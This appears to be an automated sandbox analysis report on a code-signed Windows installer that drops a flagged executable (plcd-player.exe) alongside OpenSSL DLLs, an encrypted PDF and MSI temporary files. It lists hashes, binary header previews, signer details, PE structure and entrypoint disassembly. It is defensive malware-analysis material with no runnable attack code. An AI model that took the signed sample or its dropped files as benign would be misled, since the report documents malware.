Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ...A...A...A...9N..A......A......A..4...A..4...A..4...A..4...A..h(...A..4...A...A..C..4...A..G4...A..G4"..A...AJ..A..G4...A..Rich.A..Rich...................PE..L...2.oa...........!.....87.........Py!......P7...............................L......DJ...@.........................P.E.D.....E.......G.H2....................I.,...........................@.B.......B.@............P7..............................text....77......87................. ..`.rdata.......P7......<7.............@..@.data.........F..b....E.............@....rsrc...H2....G..4...DG.............@..@.reloc..,.....I......xI.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1379352
Entropy (8bit):	6.864605291373112
Encrypted:	false
SSDEEP:	24576:Rcbj++KpP3xREx5Fvvr3WH9IYf0mF8wBpoJqzTi1QA96:Rrpi3r3WH9IYf+wBpoJqzTi1QA96
MD5:	7CC7637AB23A01396206E82EF45CDA0E
SHA1:	209CC6CE91E24383213F1C2456D43E48BD09B8C4
SHA-256:	E6C6568A2CD61E401DB4E4F317F139852502EEBB9FE1FBB9C92D7ECFA6524F7F
SHA-512:	E13C48D6CB7B2983221F00C3FDC5DA4221D6B0383F68D74BCAC2AAF95CC7AE702E65DA517AAD51AD7DAD0B672F8436532F4612E7F0853AE0CA924635F3983F6D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..J%..%..%..,......,...>..%......!.....%..0..,......,...$..,...$..,...$..Rich%..................PE..L...<K.V...........!.....L...........u.......`...............................@.....................................0...r...l...x.......0................:.........pb..............................0...@............`..(............................text....J.......L.................. ..`.rdata...V...`...X...P..............@..@.data............t..................@....rsrc...0...........................@..@.reloc..P............"..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ml Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PDF document, version 1.5
Category:	dropped
Size (bytes):	418532
Entropy (8bit):	7.992704655006582
Encrypted:	true
SSDEEP:	12288:gC3QjgVE/DGk/1gsQR4jflsCEqmnUT9ca7cgTe9b:F3m7zqieCU4NlTO
MD5:	EF946663D3A336BDACB512BF32C8F8F2
SHA1:	1A02B2DEE5CD8815BA977A09505F0B38FEA27665
SHA-256:	0B77203265ADCB18A878383978BCE5C8D6A1D253FE1EFC16B8B161B42F03B79F
SHA-512:	B5E45C3F22F31FD1538C982C83F75DA1015FF56235B26EA1707DCA6B1BC1E41FB11557593CED91D5BF927B985511DBA4047C898A1FE9EB7903932FDBF6C85829
Malicious:	false
Preview:	%PDF-1.5.%.....2 0 obj.<<./Type /ObjStm./N 100./First 806./Length 1140 ./Filter /FlateDecode.>>.stream.x.V]o.8.\|....h..H.E...m.P\q.........d.r..fe.n....%...........y.....KB...4....d.....$..$i....P...I9.Z.R....I..%.c.#.eZ.)\|.%.g...0i.Q.........E...&.^c..8..g.N.Y!..W.r... .A...!,.`...........0.......O`B.$.t8X",x=.)..BHi....<.$.x.Lb..2.....L.`.l)r..M....^.R.k....%.n.....^..'`..,...3.@e....P...5.Z..8&....9..j.g....\|.H..P.....".Y..D.z1)...$.c..2.&,.....B..du.....&.....T.7j%..P-..#P/.9(&5g....W..=..f.x.fc...{".8.,.w)....0.\..(.%..1..&.'`v...(g.....r.K....;.y.....n.....S...+z.>{......l+...r.{...#x.8....n....._..........1^...u..X.....n.7.9.1..c...Kz.....2t.rQ7..L.q.I.2{....'z.....=....]9....p.0.....n.vU?n...P....n"<...9).cu>.}_.I.be>4]7........$iN._t...1..........t..2....nG..o)..E..6.........r...se..=...;].vz...4......y...S...E=. aH..zp.tP... .Hu;u.f..?...)L......U.P.y..1\|..\.MH..=...C.....[]s?......h....g.B9../..l....k..1:wE.S.v.:

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3768184
Entropy (8bit):	6.323324235457555
Encrypted:	false
SSDEEP:	49152:mdziNWio/OWFGZ/7pqfwbAFj1IKdn9kvOIBzuJTHPfw8xZcca9KJi4EIdG:sBaNsKKdn9AzBqw8xZcca9KJi4s
MD5:	25DDBD309BB8094229704383977C7268
SHA1:	1574D860469EE784034093199DC9533543E5C096
SHA-256:	8C7E6A620F4BBC343C2695C2E034CC628062B5C2A6B05461FC41B05436F45147
SHA-512:	16CF4205B16F83A3EFEC96660190EFE254919EA18FBC6EB23F45D5C77B0A4A7EFD5DFA36EC1FC43BD79D1D4959A2FA9E172AB842CE7DE754CDC62912752892BA
Malicious:	true
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......N..,..............O.....X..~....X..~....X..~....X..~.......~........e...\..~....\..~....\.#.......K.....\..~....Rich.....`.SH..R.`[RK..RJ.3RK..R.`.SK..RRichJ..R........................PE..L....,oa.............................u............@...........................9.....q.9...@.................................,S1.d.....4..5...........l9.x.....7.............................@.......H...@...............x............................text.............................. ....rdata..B...........................@..@.data....;...p1..(...T1.............@....rsrc....5....4..6...\|4.............@..@.reloc........7.......7.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	349720
Entropy (8bit):	6.600820777591867
Encrypted:	false
SSDEEP:	6144:Nv4Nuw10tGJjPZTbGT/yMzU/RSzBnEywGrfG/ySTJ7a7hNl/K5bv3jgNZuDwsLB+:N4Nuw10tGJjPZTbkyMzU/RSzBnHHrf+0
MD5:	F0AED1A32121A577594ECD66980C3ED3
SHA1:	288954A8D6F48639B7605488D2796B14291507E5
SHA-256:	D02CC01A7D9ADC1E6F980D1A56D6A641DF9E2A63FDC5F007264D1BF59ECC1446
SHA-512:	056670F3074AF5A03326C2BE5FFA0FEC23010DDC25BBED07B295EA3F6C7F8DFBC73E40E11E20103EFEB3B230096F630FB0A3CFA61C4E0A74C15A1CB6319D85D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r.......r.......r......r......r...s.4.r....\.r.......r......r......r.Rich..r.................PE..L...<K.V...........!.........l.......).......................................p......................................p...9)......<.... ..0................:...0...,..0...............................x{..@............................................text............................... ..`.rdata..............................@..@.data....[.......@..................@....rsrc...0.... ......................@..@.reloc..b3...0...4..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\440bbd.msi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {D9FF1A35-78F9-49F0-A6A0-DB3A11387835}, Number of Words: 8, Subject: JDesktop Tools, Author: JDesktop Integration Components (JDIC) Project, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2233856
Entropy (8bit):	6.540847260876917
Encrypted:	false
SSDEEP:	49152:TDs/YrEUl8VlvfqAE/fQhksQQNgXAo1sVzhly+PkfsJJ10FRzVT8ajBK+ByqV4Tq:GYrEkXAEfs01sVNrajM+
MD5:	9AFC8137B547561655D454AFF862E567
SHA1:	2DAB8B1B9F1AE612E9CD359207751B452C76CB0D
SHA-256:	86747F0567ADBDD895E23E25760AF726A87000BD01EBEF994352EFAD7EB3987C
SHA-512:	91B99B561FBD3C6F3C2583CBF13D9FAF31AAFE6EFDB82667F646AD9F245904D3EF8F37B4CD11E141ECBEBDB7724414E21C4A8F7886CE68FFAC7B0BB8B1B5383B
Malicious:	false
Preview:	......................>...................#...................................I.......v.......................................................................................................................\|...........................................................................................................................................................................................................................................................................................................................c...............%...8........................................................................................... ...!..."...#...$...0.../...'...(...)...*...+...,...-...........6...1...2...3...4...5...9...7...?...C...:...;...<...=...>...B...@...A...K...S...D...E...F...G...H...R.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI11D7.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1488.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI15F0.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI16EB.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	887264
Entropy (8bit):	6.436854443892135
Encrypted:	false
SSDEEP:	24576:gJgZXlAIjfQhETbF+RWQNgXAo1sVz1v0Mny+PkfsJJ10FRzVTv:F/fQhksQQNgXAo1sVzhly+PkfsJJ10FT
MD5:	0BE6E02D01013E6140E38571A4DA2545
SHA1:	9149608D60CA5941010E33E01D4FDC7B6C791BEA
SHA-256:	3C5DB91EF77B947A0924675FC1EC647D6512287AA891040B6ADE3663AA1FD3A3
SHA-512:	F419A5A95F7440623EDB6400F9ADBFB9BA987A65F3B47996A8BB374D89FF53E8638357285485142F76758BFFCB9520771E38E193D89C82C3A9733ED98AE24FCB
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............................4................................................3......3......3.?.....W....3......Rich............................PE..L.....Ia.........."!................................................................KC....@.............................t...d........................p..........T.......p...................@.......h...@............................................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc................\|..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1815.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI193F.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	587232
Entropy (8bit):	6.421744382064001
Encrypted:	false
SSDEEP:	12288:qKrajAXKBGIpTOS7OmddoqaclGOh40JEh+DiYgZmD8x32id4PlV1uJTG:dajmU120q+Byd4V4TG
MD5:	2A6C81882B2DB41F634B48416C8C8450
SHA1:	F36F3A30A43D4B6EE4BE4EA3760587056428CAC6
SHA-256:	245D57AFB74796E0A0B0A68D6A81BE407C7617EC6789840A50F080542DACE805
SHA-512:	E9EF1154E856D45C5C37F08CF466A4B10DEE6CF71DA47DD740F2247A7EB8216524D5B37FF06BB2372C31F6B15C38101C19A1CF7185AF12A17083207208C6CCBD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PD.z>..z>..z>...=..z>...;.Xz>...:..z>...=..z>...:..z>...;..z>...8..z>...?..z>..z?..{>.K.7..z>.K.>..z>.K....z>..z...z>.K.<..z>.Rich.z>.................PE..L.....Ia.........."!.....T...........I.......p............................... ......).....@..........................r.......s..........h........................X......p...........................x...@............p.......p..@....................text....S.......T.................. ..`.rdata.......p.......X..............@..@.data................n..............@....rsrc...h............\|..............@..@.reloc...X.......Z..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3F85.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	7026
Entropy (8bit):	5.541123008392793
Encrypted:	false
SSDEEP:	192:YUSgIVbUcFgRLfqnJVjE/HT+qOLsZzibbiMMkzQe4ksKJBwb:YUSgINHFgRLfqnJVjE/HT+qwsZzibbid
MD5:	9CAB97F717701D6FB15A69CC1B29810D
SHA1:	30260027C03E49562C9C90C90DAB8BF00F295A56
SHA-256:	345CAEE89596ACE857B062A71AF36767E88F3ECEFA35DD7523888529631C4F7A
SHA-512:	2322805CC581B672BB87D9D7F38D2C2C93A0093DF2F492ED7DB346A11F4235C91A479E8A148DE071C7D6873C304924E2547D701F49233544BF27DCDD59CA4966
Malicious:	false
Preview:	...@IXOS.@.....@"]YS.@.....@.....@.....@.....@.....@......&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}..JDesktop Tools..adv.msi.@.....@.....@.....@........&.{D9FF1A35-78F9-49F0-A6A0-DB3A11387835}.....@.....@.....@.....@.......@.....@.....@.......@......JDesktop Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{F5BA1B6B-756B-4B40-A5CB-A8A21E79DAE6}].C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\.@.......@.....@.....@......&.{FC3D5B52-2561-4633-85CB-6F8B8A86F2F9}R.01:\Software\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Version.@.......@.....@.....@......&.{8C82D735-0397-4468-B16C-3DB17F7A7006}f.01:\Software\Caphyon\Advanced Installer\LZMA\{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}\3.4.0.2\AI_ExePath.@.......@.....@.....@......&.{0B568A04-369C-43FB-98E4-C437A15709E0}l.C:\Users\user\AppData\Roam

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	79122
Entropy (8bit):	5.282105373471904
Encrypted:	false
SSDEEP:	192:jmXs969ozNSkk3peTBYeHt0tfoI9qsjl0urmwYyio:yXs9UogeWeH29qclhmwYyio
MD5:	B5E2563FF9A8BBA4AE2605C562F1566C
SHA1:	461A990EEDB948D9F539D28A7D36147AB037B5CB
SHA-256:	B083E139C5D016B77E22DA876357A7E8CA6EFF8FE119DA02A0C91448B5611F5C
SHA-512:	2BD1C7FCF4D900EA797B7B3BE1DAF2989AA9024DC3716DE66EAFFCC4733637C34E326C79A8A92C6EA2311534F86A2E14D75DC07E48A68507B0570C4E6049E0F6
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.710856115150992
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	o4c8AUtX1g.exe
File size:	7840232
MD5:	c7db399951b19ea446599dc3800a3111
SHA1:	b01352206ec1935a1123d7d4ea8394647e6b3d00
SHA256:	ceba6a7f9a2c25a35090470c6209aefed808786c47194a18415a7898390c20cb
SHA512:	974c8824a2bd3cc7b65d3de4c8cfdb72564ab9b351528510ffd24d50c314afb9789130cf6e46e70ba41d199f37540c1628e0ef83afea2ec2f3499e8d188a6782
SSDEEP:	196608:cL6ocnTAcca9KJi4G+eiPUei/L6StB1o4lLMjgfIg/rNv+J3U:G6JnTAcca9KJi4teSq/WSb6aagfTTiU
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............K...K...K...J...K...JX..K...J...K...J...K...J...K...J...K...J...K...J...K...J...K...K ..KX..J...KX.oK...K...K...KX..J...

File Icon


Icon Hash:	f0c49c70f99cc4f0

Static PE Info

General
Entrypoint:	0x52c471
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6149D0A9 [Tue Sep 21 12:31:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	0748c08f838865e5d72743f7fd7e551e

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	9/2/2021 2:00:00 AM 9/3/2022 1:59:59 AM
Subject Chain	CN=Baltic Auto SIA, O=Baltic Auto SIA, S=RÄ«ga, C=LV, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=LV, SERIALNUMBER=40103318287
Version:	3
Thumbprint MD5:	80D1AF7742336F8CCA96BF7A44976DF2
Thumbprint SHA-1:	30576D884D8311D503D9CB030FD547DC26D1AB6B
Thumbprint SHA-256:	1F893C08CE7915D76394082DD884A6771493247B9169B6579AED99F8606AD484
Serial:	3D3FC30099D6C7AEB806D4181992AF90

Entrypoint Preview

Instruction
call 00007F38D8B3DF31h
jmp 00007F38D8B3D73Fh
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F38D8B3E01Fh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F38D8B3E009h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F38D8B3CD62h
jmp 00007F38D8B3D8A2h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005E6024h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005E6024h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e468c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ed000	0x38ea0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x777b88	0x2660
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x226000	0x19c0c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1aab68	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1aac00	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x186e68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x185000	0x2c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x1e1d28	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x183b2f	0x183c00	False	0.450583796744	data	6.42629991801	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x185000	0x60684	0x60800	False	0.325258561367	data	4.58910819653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e6000	0x6e78	0x5600	False	0.130405159884	data	2.02713431011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1ed000	0x38ea0	0x39000	False	0.239840323465	data	5.41863510681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x226000	0x19c0c	0x19e00	False	0.504642210145	data	6.56301368687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
IMAGE_FILE	0x1edae8	0x6	ISO-8859 text, with no line terminators	English	United States
IMAGE_FILE	0x1edaf0	0x6	ISO-8859 text, with no line terminators	English	United States
RTF_FILE	0x1edaf8	0x2e9	Rich Text Format data, version 1, ANSI	English	United States
RTF_FILE	0x1edde4	0xa1	Rich Text Format data, version 1, ANSI	English	United States
RT_BITMAP	0x1ede88	0x13e	data	English	United States
RT_BITMAP	0x1edfc8	0x828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_BITMAP	0x1ee7f0	0x48a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_BITMAP	0x1f3098	0xa6a	data	English	United States
RT_BITMAP	0x1f3b04	0x152	data	English	United States
RT_BITMAP	0x1f3c58	0x828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x1f4480	0x4513	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x1f8994	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x2091bc	0x94a8	data	English	United States
RT_ICON	0x212664	0x5488	data	English	United States
RT_ICON	0x217aec	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848	English	United States
RT_ICON	0x21bd14	0x25a8	data	English	United States
RT_ICON	0x21e2bc	0x10a8	data	English	United States
RT_ICON	0x21f364	0x988	data	English	United States
RT_ICON	0x21fcec	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x220154	0x5c	data	English	United States
RT_MENU	0x2201b0	0x2a	data	English	United States
RT_DIALOG	0x2201dc	0xac	data	English	United States
RT_DIALOG	0x220288	0x2a6	data	English	United States
RT_DIALOG	0x220530	0x3b4	data	English	United States
RT_DIALOG	0x2208e4	0xbc	data	English	United States
RT_DIALOG	0x2209a0	0x204	data	English	United States
RT_DIALOG	0x220ba4	0x282	data	English	United States
RT_DIALOG	0x220e28	0xcc	data	English	United States
RT_DIALOG	0x220ef4	0x146	data	English	United States
RT_DIALOG	0x22103c	0x226	data	English	United States
RT_DIALOG	0x221264	0x388	data	English	United States
RT_DIALOG	0x2215ec	0x1b4	data	English	United States
RT_DIALOG	0x2217a0	0x136	data	English	United States
RT_DIALOG	0x2218d8	0x4c	data	English	United States
RT_STRING	0x221924	0x45c	data	English	United States
RT_STRING	0x221d80	0x344	data	English	United States
RT_STRING	0x2220c4	0x2f8	data	English	United States
RT_STRING	0x2223bc	0x598	data	English	United States
RT_STRING	0x222954	0x3aa	data	English	United States
RT_STRING	0x222d00	0x5c0	data	English	United States
